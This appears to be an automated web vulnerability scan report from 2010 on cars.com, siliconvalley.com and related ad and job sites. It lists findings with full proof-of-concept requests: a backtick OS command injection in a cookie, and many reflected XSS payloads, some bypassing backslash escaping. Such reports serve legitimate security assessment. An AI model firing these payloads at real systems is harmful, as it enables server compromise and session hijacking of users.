2.335. http://www.careerbuilder.com/PLI/R/JSToolkit.htm [Referer HTTP header]

2.336. http://www.careerbuilder.com/PLI/R/ResDistribution.htm [Referer HTTP header]

2.337. http://www.careerbuilder.com/PLI/R/ResUpgrades.htm [Referer HTTP header]

2.338. http://www.careerbuilder.com/PLI/R/StellarResume.htm [Referer HTTP header]

2.339. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx [Referer HTTP header]

2.340. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx [Referer HTTP header]

2.341. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx [Referer HTTP header]

2.342. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx [Referer HTTP header]

2.343. http://www.careerpath.com/ [Referer HTTP header]

2.344. http://www.careerpath.com/career-tests/ [Referer HTTP header]

2.345. http://www.careerrookie.com/ [Referer HTTP header]

2.346. http://www.careerrookie.com/jobs/keyword/internships [Referer HTTP header]

2.347. http://www.cbsalary.com/ [Referer HTTP header]

2.348. http://www.cbsalary.com/ [Referer HTTP header]

2.349. http://www.cbsalary.com/salary-calculator.aspx [Referer HTTP header]

2.350. http://www.cbsalary.com/salary-calculator.aspx [Referer HTTP header]

2.351. http://www.kariera.gr/ [Referer HTTP header]

2.352. http://www.miracleworkers.com/ [Referer HTTP header]

2.353. http://www.personified.com/ [Referer HTTP header]

2.354. http://research.cars.com/go/crp/buyingGuides/Story.jsp [REST URL parameter 1]

2.355. http://research.cars.com/go/crp/buyingGuides/Story.jsp [REST URL parameter 2]

2.356. http://research.cars.com/go/crp/buyingGuides/Story.jsp [REST URL parameter 3]

3. Cleartext submission of password

4. SSL cookie without secure flag set

5. Session token in URL

5.1. https://secure.www.siliconvalley.com/

5.2. https://secure.www.siliconvalley.com/registration/

6. Cookie without HttpOnly flag set

6.1. https://secure.www.siliconvalley.com/

6.2. http://b.scorecardresearch.com/r

6.3. http://mngisv.112.2o7.net/b/ss/mngisv/1/H.17--NS/0

7. Cookie scoped to parent domain

7.1. http://b.scorecardresearch.com/r

7.2. http://mngisv.112.2o7.net/b/ss/mngisv/1/H.17--NS/0

8. Cross-domain Referer leakage

8.1. https://secure.www.siliconvalley.com/registration/

8.2. http://www.facebook.com/plugins/like.php

9. Cross-domain script include

9.1. https://secure.www.siliconvalley.com/

9.2. https://secure.www.siliconvalley.com/registration/

9.3. http://www.facebook.com/plugins/like.php

10. Email addresses disclosed

10.1. https://secure.extras.mnginteractive.com/live/js/omniture/SiteCatalystCode_H_17.js

10.2. https://secure.www.siliconvalley.com/

11. HTML does not specify charset



1. OS command injection

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cars.com
Path:   /go/advice/Story.jsp

Issue detail

The Registration cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the Registration cookie. The application took 47237 milliseconds to respond to the request, compared with 1819 milliseconds for the original request, indicating that the injected command caused a time delay.

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:

Request

GET /go/advice/Story.jsp?section=safe&story=crashRatings&subject=crash&aff=herald HTTP/1.1
Host: www.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=herald; Registration=currentUserId:KfmlyWYhFkF6hi8PBJ7JnLtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLrtGFQMgZeQudd2WTuN/uAzCDILgnRjnZLUy5U9isFvDMv0KLkDLWN0=`ping%20-c%2020%20127.0.0.1`; JSESSIONID=00007UZLE2Nig5PFqEqtsC8HigI:155htdomo; cars_persist=3896579244.20480.0000; SEARCH_JSESSIONID=0000X7_SMU0dzHTgmw7Vfm9sRde:155hum6u8;

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 00:35:20 GMT
Server: IBM_HTTP_Server
Surrogate-Control: content="ESI/1.0"
Set-Cookie: JSESSIONID=0000p70wVhUcgPoKmB-tiCMuLDj:155htdomo; Path=/
Set-Cookie: Registration=currentUserId:bn6IMss6QnKWiMSyT/GWubtGFQMgZeQuu0YVAyBl5C67RhUDIGXkLtdt8Lc+fbQm6DmHZY3u3I69QJd7cbSvCgGQdbOpYT61Vk875IzXHQo=; Expires=Sat, 14 Nov 2015 00:38:30 GMT; Path=/; Domain=www.cars.com
Set-Cookie: affiliate=herald; Expires=Mon, 06 Dec 2010 00:38:30 GMT; Path=/; Domain=www.cars.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Via: 1.1 Cars-XFW
Connection: close
Set-Cookie: cars_persist=3896579244.20480.0000; expires=Mon, 15-Nov-2010 01:08:31 GMT; path=/
Vary: Accept-Encoding, User-Agent
Content-Length: 53075

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">



...[SNIP]...

2. Cross-site scripting (reflected)
There are 356 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://66.70.86.62/feed.gbmap [i parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://66.70.86.62
Path:   /feed.gbmap

Issue detail

The value of the i request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8a0f'-alert(1)-'3c4a4687659 was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1&i=2834c0d2aa8a0f'-alert(1)-'3c4a4687659 HTTP/1.1
Host: 66.70.86.62
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 00:21:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 609

document.write('<ifr' + 'ame name=gbmap id=gbmap width=0 height=0 scrolling=no frameborder=0 src=\'\'></ifr' + 'ame>');var gb_script;gb_script = document.createElement('script');gb_script.src = 'http://66.70.86.62/feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1&i=2834c0d2aa8a0f'-alert(1)-'3c4a4687659&url=' + encodeURIComponent(document.location.href.replace('http://','').replace('https://','').replace('ftp://','').replace('www.',''));gb_script.type = 'text/javascript';gb_script.defer = true;head =
...[SNIP]...

2.2. http://66.70.86.62/feed.gbmap [k parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://66.70.86.62
Path:   /feed.gbmap

Issue detail

The value of the k request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acaf4'-alert(1)-'7eba7def320 was submitted in the k parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1acaf4'-alert(1)-'7eba7def320&i=2834c0d2a HTTP/1.1
Host: 66.70.86.62
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Nov 2010 00:21:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 609

document.write('<ifr' + 'ame name=gbmap id=gbmap width=0 height=0 scrolling=no frameborder=0 src=\'\'></ifr' + 'ame>');var gb_script;gb_script = document.createElement('script');gb_script.src = 'http://66.70.86.62/feed.gbmap?k=uWvWSxgUfRhmuAhMY4lzh1MWubFHEABGPWZb1p7uSkoS3aIrL60fDQSiEuaTAQ%2b1acaf4'-alert(1)-'7eba7def320&i=2834c0d2a&url=' + encodeURIComponent(document.location.href.replace('http://','').replace('https://','').replace('ftp://','').replace('www.',''));gb_script.type = 'text/javascript';gb_script.defer =
...[SNIP]...

2.3. http://acc.cars.com/jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd277\"%3balert(1)//95814bce789 was submitted in the REST URL parameter 1. This input was echoed as fd277\\";alert(1)//95814bce789 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserverfd277\"%3balert(1)//95814bce789/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 HTTP/1.1
Accept: */*
Referer: http://www.cars.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: acc.cars.com
Proxy-Connection: Keep-Alive
Cookie: cars_persist=3863024812.20480.0000

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:06 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 583
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=acc.cars.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<iframe src=\"http://acc.cars.com/accipiter/adclick/CID=00026a3564e3f66300000000fd277\\";alert(1)//95814bce789/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261/relocate=http://open.ad.yieldmanager.net/a1?pubId=23449523269&site=Miami%20Herald&cntTy=iframe&rTy=ac&
...[SNIP]...

2.4. http://acc.cars.com/jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2848b\"%3balert(1)//7913391f575 was submitted in the REST URL parameter 2. This input was echoed as 2848b\\";alert(1)//7913391f575 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random2848b\"%3balert(1)//7913391f575=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 HTTP/1.1
Accept: */*
Referer: http://www.cars.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: acc.cars.com
Proxy-Connection: Keep-Alive
Cookie: cars_persist=3863024812.20480.0000

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:08 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 583
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=acc.cars.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<iframe src=\"http://acc.cars.com/accipiter/adclick/CID=00026a3564e3f66300000000/acc_random2848b\\";alert(1)//7913391f575=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261/relocate=http://open.ad.yieldmanager.net/a1?pubId=23449523269&site=Miami%20Herald&cntTy=iframe&rTy=ac&sz=728x90&c
...[SNIP]...

2.5. http://acc.cars.com/jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94d74\"%3balert(1)//bb209c18b07 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94d74\\";alert(1)//bb209c18b07 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261?94d74\"%3balert(1)//bb209c18b07=1 HTTP/1.1
Accept: */*
Referer: http://www.cars.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: acc.cars.com
Proxy-Connection: Keep-Alive
Cookie: cars_persist=3863024812.20480.0000

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 02:43:35 GMT
X-DirectServer: cvcars_DS0
Content-Type: application/x-javascript
Content-Length: 586
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=acc.cars.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<iframe src=\"http://acc.cars.com/accipiter/adclick/CID=00026a3564e3f66300000000/acc_random=1289774564263/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=homepage/pageid=1289774564261?94d74\\";alert(1)//bb209c18b07=1&relocate=http://open.ad.yieldmanager.net/a1?pubId=23449523269&site=Miami%20Herald&cntTy=iframe&rTy=ac&sz=728x90&cTopId=20254501&V=2&cCat=Cars_Front&cSctn=vendor&rFrame=1&fmt=standard%20graphical&cDs
...[SNIP]...

2.6. http://acc.cars.com/jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 916f0\"%3balert(1)//f22c0a0d6c2 was submitted in the REST URL parameter 1. This input was echoed as 916f0\\";alert(1)//f22c0a0d6c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver916f0\"%3balert(1)//f22c0a0d6c2/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 02:43:47 GMT
X-DirectServer: cvcars_DS0
Content-Type: application/x-javascript
Content-Length: 373
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<a href=\"http://acc.cars.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc916f0\\";alert(1)//f22c0a0d6c2/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261\" target=\"_blank\">
...[SNIP]...

2.7. http://acc.cars.com/jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d38f\"%3balert(1)//1539b4dcad0 was submitted in the REST URL parameter 2. This input was echoed as 1d38f\\";alert(1)//1539b4dcad0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random1d38f\"%3balert(1)//1539b4dcad0=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:18 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 373
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<a href=\"http://acc.cars.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc/acc_random1d38f\\";alert(1)//1539b4dcad0=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261\" target=\"_blank\">
...[SNIP]...

2.8. http://acc.cars.com/jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0836\"%3balert(1)//e13954b58bb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0836\\";alert(1)//e13954b58bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261?a0836\"%3balert(1)//e13954b58bb=1 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:14 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 376
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<a href=\"http://acc.cars.com/accipiter/adclick/CID=fffffffcfffffffcfffffffc/acc_random=1289774564329/SITE=CARS.COM/AAMSZ=1x1/AFF=herald/AREA=homepage.sponsored.video/pageid=1289774564261?a0836\\";alert(1)//e13954b58bb=1\" target=\"_blank\">
...[SNIP]...

2.9. http://acc.cars.com/jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0050\"%3balert(1)//7ed6d85a66a was submitted in the REST URL parameter 1. This input was echoed as c0050\\";alert(1)//7ed6d85a66a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserverc0050\"%3balert(1)//7ed6d85a66a/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:17 GMT
X-DirectServer: cvcars_DS3
Content-Type: application/x-javascript
Content-Length: 609
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

